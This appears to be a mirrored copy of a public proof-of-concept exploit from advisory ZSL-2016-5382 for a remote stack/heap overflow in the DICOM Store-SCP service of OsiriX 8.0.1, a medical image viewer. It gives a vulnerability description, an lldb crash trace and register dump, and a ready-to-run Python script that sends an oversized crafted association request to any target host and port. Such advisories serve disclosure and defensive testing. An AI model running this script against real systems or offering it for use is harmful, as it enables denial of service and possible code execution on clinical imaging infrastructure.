扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
#!/usr/bin/env python # -*- coding: utf8 -*- # # # OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability # # # Vendor: Pixmeo Sarl # Product web page: http://www.osirix-viewer.com # Affected version: OsiriX 8.0.1 # # Summary: With high performance and an intuitive interactive user interface, OsiriX MD is # the most widely used DICOM viewer in the world. It is the result of more than 10 years of # research and development in digital imaging. It fully supports the DICOM standard for an # easy integration in your workflow environment and an open platform for development of # processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive # innovative technique for 3D and 4D navigation and a complete integration with any PACS. # OsiriX MD supports 64-bit computing and multithreading for the best performances on the # most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled. # # Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images # (".dcm" / ".DCM" extension) produced by equipment (MRI, CT, PET, PET-CT, ...). # Osirix is complementary to existing viewers, in particular to nuclear medicine viewers. # # Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that # are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL. # Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length # of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can # overflow the stack and the heap of the process when sending large array of bytes to the presentation # context item length segment of the DICOM standard, potentially resulting in remote code execution # and/or denial of service scenario. # # ------------------------------------------------------------------------------------- # # (lldb) # Process 65202 stopped # * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite<code>parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1) # frame #0: 0x0000000108978441 OsiriX Lite</code>parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 # OsiriX Lite<code>parseAssociate: # ->0x108978441 <+833>: movzbl (%r10), %eax # 0x108978445 <+837>: cmpl $0x40, %eax # 0x108978448 <+840>: movq -0x200(%rbp), %rcx # 0x10897844f <+847>: je 0x108978513 ; <+1043> # (lldb) bt # * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite</code>parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1) # * frame #0: 0x0000000102fe8441 OsiriX Lite<code>parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 # frame #1: 0x0000000102fe4363 OsiriX Lite</code>AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339 # frame #2: 0x0000000102fe14ca OsiriX Lite<code>PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314 # frame #3: 0x0000000102fdae9c OsiriX Lite</code>DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348 # frame #4: 0x0000000102facf1e OsiriX Lite<code>ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462 # frame #5: 0x0000000102c5f28f OsiriX Lite</code>DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207 # frame #6: 0x0000000102c3f9c7 OsiriX Lite<code>-[DCMTKQueryRetrieveSCP run] + 4999 # frame #7: 0x0000000102987a37 OsiriX Lite</code>-[AppController startSTORESCP:] + 519 # frame #8: 0x00007fff975b030d Foundation<code>__NSThread__start__ + 1243 # frame #9: 0x00007fffab021aab libsystem_pthread.dylib</code>_pthread_body + 180 # frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib<code>_pthread_start + 286 # frame #11: 0x00007fffab021221 libsystem_pthread.dylib</code>thread_start + 13 # (lldb) register read # General Purpose Registers: #rax = 0x0000000000000103 #rbx = 0x00000001044c18d8OsiriX Lite<code>ECC_Normal #rcx = 0x00006100002e6200 #rdx = 0x000000000001ad41 #rdi = 0x00000001044c18d8OsiriX Lite</code>ECC_Normal #rsi = 0x00006100002e6200 #rbp = 0x0000700005a4a670 #rsp = 0x0000700005a4a420 # r8 = 0x0000000000000103 # r9 = 0x00000000fb40cfc6 #r10 = 0x00007fab8ac000a1 #r11 = 0x0000000000000041 #r12 = 0x0000700005a4a6b8 #r13 = 0x00000001044c18f0OsiriX Lite<code>EC_Normal #r14 = 0x00000001044c18d8OsiriX Lite</code>ECC_Normal #r15 = 0x0000000000008014 #rip = 0x0000000102fe8441OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833 # rflags = 0x0000000000010286 # cs = 0x000000000000002b # fs = 0x0000000000000000 # gs = 0x0000000000000000 # # ------------------------------------------------------------------------------------- # # Tested on: OS X 10.12.2 (Sierra) #OS X 10.12.1 (Sierra) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2016-5382 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php # # https://tools.ietf.org/html/rfc3240 # https://github.com/commontk/DCMTK/commit/1b6bb76 # # 29.11.2016 # import sys, socket hello = ('\x01\x00\x00\x00\x80\x71\x00\x01\x00\x00\x4f\x52\x54\x48' '\x41\x4e\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4a\x4f' '\x58\x59\x50\x4f\x58\x59\x21\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34' '\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e' '\x31\x20\x00\x80\x00') bye = ('\x50\x00\x00\x0c\x51\x00\x00\x04\x00\x00\x07\xde' '\x52\x00\x00\x00') buffer = '\x41\x42\x43\x44' * 10000 if len(sys.argv) < 3: print '\nUsage: ' +sys.argv[0]+ ' <target> <port>' print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112\n' sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send(hello+buffer+bye) s.close |
体验盒子
